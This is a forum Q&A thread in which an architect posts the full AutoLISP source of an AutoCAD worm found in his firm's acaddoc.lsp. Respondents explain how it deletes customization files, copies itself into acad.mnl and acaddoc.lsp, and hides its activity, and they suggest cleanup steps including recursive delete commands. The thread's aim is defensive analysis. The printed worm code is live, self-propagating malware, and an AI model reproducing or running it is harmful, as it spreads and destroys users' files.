Debugging what this LISP Virus is doing

2019-04-04 14:59发布

问题:

My firm has been hit by an AutoCAD virus that is deleting and replacing our acaddoc.lsp with the routine below.

I'm an architect and not exactly sure what this is doing by the repetitive "find" and "deletes".

Questions

  1. What is this replacing the files with (currently searching for acadapq) ?
  2. Who writes a virus for AutoCAD?!?!

Has anyone seen this before? the CAD forums aren't very helpful.

(setq wold_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(setq bb 2)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq n 0)
(while (< n 1)
  (if (findfile "acad.fas")
      (if (vl-file-delete (findfile "acad.fas"))
          (setq n 0))
      (setq n 2)))

(setq n 0)
(while (< n 1)
  (if (findfile "lcm.fas")
      (if (vl-file-delete (findfile "lcm.fas"))
          (setq n 0))
      (setq n 2)))

(setq n 0)
(while (< n 1)
  (if (findfile "acad.lsp")
      (if (vl-file-delete (findfile "acad.lsp"))
          (setq n 0))
      (setq n 2)))

(defun wwriteapp ()
  (if (setq wwjm1 (open wnewacad "w"))
      (progn
        (setq wwjm (open woldacad "r"))
        (while (setq wwz (read-line wwjm))
          (write-line wwz wwjm1))
        (close wwjm)
        (close wwjm1))))

(setq lbz 0)
(setq wwjqm (strcat dpath "acaddoc.lsp"))
(if (setq wwjm (open wwjqm "r"))
    (progn
      (repeat 3 (read-line wwjm))
      (setq wz (read-line wwjm))
      (setq ab (atoi (substr wz 4 1)))
      (close wwjm)
      (if (> ab bb)
          (setq lbz 1))))

(setq wwjqm (strcat wpath "acad.mnl"))

(if (setq wwjm (open wwjqm "r"))
    (progn
      (repeat 3 (read-line wwjm))
      (setq wz (read-line wwjm))
      (setq nb (atoi (substr wz 4 1)))
      (close wwjm)
      (if (< nb bb)
          (setq lbz 1)))
    (setq lbz 1))
(if (= lbz 1)
    (progn
      (setq woldacad (strcat dpath "acaddoc.lsp"))
      (setq wnewacad (strcat wpath "acad.mnl"))
      (wwriteapp)))
(if (and (/= (substr dpath 1 1) (chr 67))
         (/= (substr dpath 1 1) (chr 68))
         (/= (substr dpath 1 1) (chr 69))
         (/= (substr dpath 1 1) (chr 70)))
    (progn
      (setq woldacad (strcat wpath "acad.mnl"))
      (setq wnewacad (strcat dpath "acaddoc.lsp"))
      (wwriteapp))
    (vl-file-delete (strcat dpath "acaddoc.lsp")))
;load "acadapq")
(setvar "cmdecho" wold_cmd)

回答1:

It is doing a support file path walk, delete and replace of the common AutoCAD customization files. ("acad.fas","acad.lsp", "acaddoc.lsp") I do not know what "lcm.fas" is all about. Is it part of an AutoCAD vertical product ie AutoCAD mechanical or Architectural desktop?

The looping is essentially "while I keep finding on the support path delete it".

So far as I know AutoCAD has no built in defense against this. (There may be some acad system var that stops execution of these files).

The "cmdecho" lines are saving and restoring the system variable that allows/suppresses the echoing of commands. Turns it off while running (so you don't notice) then restores the original setting.

A polite virus :\

When AutoCAD starts up it executes the first "acad.fas" & first "acad.lsp" it finds on it's support path. Everytime AutoCAD loads a new .dwg it executes the "acaddoc.lsp".



回答2:

As Follow these steps to get rid of this worm:

Manually Copy the attached routine on your PC: acaddocfix_1.6.lsp
Load the lisp file using APPLOAD command
The lisp file will run automatically and it will clean all the existences of the worm in your support folders.

While their is another way we can do it as a batch file by adding it once any user start his/her PC as I check with the IT before

Auto run Run an antivirus or a cleaner to get rid of “acaddoc.lsp” files. Normally cleaner routine installs a simple routine in your acad20XXdoc.lsp file which automatically clean those files but i recommend cleaning all the viruses with an anti-virus first. You can also run -acaddoc.bat dos batch file to clean all your drives manually. Run this batch once and it will delete all acaddoc.lsp files on your system.

NOTE: If any of the infected files in your Autocad Support folders are READONLY the cleaner won’t be able to clean those files !!

kindly refer to http://metinsaylan.com/how-to-clean-acaddoc-lsp-virus-from-your-pc/



回答3:

The wild thing is that the lisp file only gets created when the files are opened on the network, local copies don't seem to have this issue. add del /s acaddoc.lsp and del /s acad.lsp to all users login scripts and run this for a week or so and it should get rid of all the acaddoc.lsp and acad.lsp files which the virus coomes in...Make sure you do not actually use any of these files for your own purpose though before running the delete command